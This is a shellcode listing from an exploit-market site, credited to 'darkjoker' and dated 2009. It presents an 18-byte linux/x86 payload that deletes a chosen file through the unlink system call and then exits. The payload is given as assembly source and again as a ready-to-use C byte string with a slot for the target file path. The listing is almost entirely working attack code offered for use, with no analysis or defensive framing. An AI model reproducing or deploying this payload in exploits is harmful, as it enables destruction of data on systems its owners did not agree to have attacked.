[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 File unlinker 18 bytes + file path length

Author
darkjoker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7212
Category
shellcode
Date add
03-03-2009
Platform
linux/x86
===================================================
linux/x86 File unlinker 18 bytes + file path length
===================================================




/*
Author    : darkjoker
Site      : http://darkjoker.net23.net
Shellcode : linux/x86 File unlinker 18 bytes + file path length

        .global _start
_start:
        jmp     one

two:
        pop     %ebx
        movb    $0xa,%al
        int     $0x80

        movb    $0x1, %al
        xor     %ebx, %ebx
        int     $0x80

one:
        call    two
        .string "file"
*/

char main [] =
"\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0"
"\x01\x31\xdb\xcd\x80\xe8\xf0\xff"
"\xff\xff"
"file" //Here file path to delete



#  0day.today [2024-10-06]  #